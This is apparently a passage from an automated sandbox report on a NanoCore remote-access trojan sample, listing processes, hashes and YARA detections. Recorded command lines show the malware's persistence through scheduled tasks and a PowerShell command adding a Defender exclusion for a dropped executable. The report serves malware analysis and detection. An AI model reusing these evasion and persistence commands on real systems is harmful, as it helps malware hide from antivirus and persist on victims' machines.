                                • Rule: NanoCore, Description: unknown, Source: 00000006.00000000.299335853.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.517591077.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.521004165.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.521004165.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.521004165.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000006.00000002.521004165.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.513680149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.513680149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.513680149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                Reputation:low

                                Target ID:16
                                Start time:20:25:55
                                Start date:10/05/2022
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp6DAD.tmp
                                Imagebase:0x1c0000
                                File size:185856 bytes
                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:17
                                Start time:20:25:56
                                Start date:10/05/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff647620000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:18
                                Start time:20:25:58
                                Start date:10/05/2022
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp7772.tmp
                                Imagebase:0x1c0000
                                File size:185856 bytes
                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:19
                                Start time:20:25:58
                                Start date:10/05/2022
                                Path:C:\Users\user\Desktop\U7Ncg7oAyC.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\U7Ncg7oAyC.exe 0
                                Imagebase:0x420000
                                File size:664064 bytes
                                MD5 hash:1D2CA2D522F8F4E99609CF7E88E673B4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000013.00000002.384938469.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000013.00000002.409136026.00000000043D9000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.409136026.00000000043D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.409136026.00000000043D9000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                Reputation:low

                                Target ID:21
                                Start time:20:25:59
                                Start date:10/05/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff647620000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:22
                                Start time:20:26:03
                                Start date:10/05/2022
                                Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
                                Imagebase:0xcf0000
                                File size:664064 bytes
                                MD5 hash:1D2CA2D522F8F4E99609CF7E88E673B4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000016.00000002.410739421.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.419521578.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.419521578.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.419521578.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 63%, ReversingLabs
                                Reputation:low

                                Target ID:24
                                Start time:20:26:09
                                Start date:10/05/2022
                                Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
                                Imagebase:0x3b0000
                                File size:664064 bytes
                                MD5 hash:1D2CA2D522F8F4E99609CF7E88E673B4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000018.00000002.427276046.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000018.00000002.434654746.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000018.00000002.434654746.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000018.00000002.434654746.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                Reputation:low

                                Target ID:25
                                Start time:20:26:13
                                Start date:10/05/2022
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
                                Imagebase:0xc00000
                                File size:430592 bytes
                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET

                                Target ID:26
                                Start time:20:26:14
                                Start date:10/05/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff647620000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:27
                                Start time:20:26:14
                                Start date:10/05/2022
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp
                                Imagebase:0x1c0000
                                File size:185856 bytes
                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:28
                                Start time:20:26:16
                                Start date:10/05/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff647620000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:29
                                Start time:20:26:18
                                Start date:10/05/2022
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
                                Imagebase:0xc00000
                                File size:430592 bytes
                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET

                                Target ID:30
                                Start time:20:26:19
                                Start date:10/05/2022
                                Path:C:\Users\user\Desktop\U7Ncg7oAyC.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\U7Ncg7oAyC.exe
                                Imagebase:0xd10000
                                File size:664064 bytes
                                MD5 hash:1D2CA2D522F8F4E99609CF7E88E673B4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001E.00000002.416390532.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 0000001E.00000002.416390532.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001E.00000000.379537717.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001E.00000000.379537717.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 0000001E.00000000.379537717.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001E.00000002.411971893.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001E.00000002.411971893.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 0000001E.00000002.411971893.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001E.00000002.416870536.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 0000001E.00000002.416870536.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001E.00000000.376862241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001E.00000000.376862241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 0000001E.00000000.376862241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001E.00000000.378843242.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001E.00000000.378843242.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 0000001E.00000000.378843242.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001E.00000000.373615736.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001E.00000000.373615736.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 0000001E.00000000.373615736.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                                Target ID:31
                                Start time:20:26:19
                                Start date:10/05/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff647620000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:32
                                Start time:20:26:20
                                Start date:10/05/2022
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmpE07C.tmp
                                Imagebase:0x1c0000
                                File size:185856 bytes
                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:33
                                Start time:20:26:24
                                Start date:10/05/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff647620000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:34
                                Start time:20:26:28
                                Start date:10/05/2022
                                Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                Imagebase:0xaa0000
                                File size:664064 bytes
                                MD5 hash:1D2CA2D522F8F4E99609CF7E88E673B4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000000.386853119.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000000.386853119.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000000.386853119.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000000.389457782.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000000.389457782.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000000.389457782.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.429959186.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.429959186.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.429959186.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.432551676.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.432551676.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.432713600.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.432713600.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000000.394464414.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000000.394464414.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000000.394464414.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000000.393280850.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000000.393280850.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000000.393280850.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                                No disassembly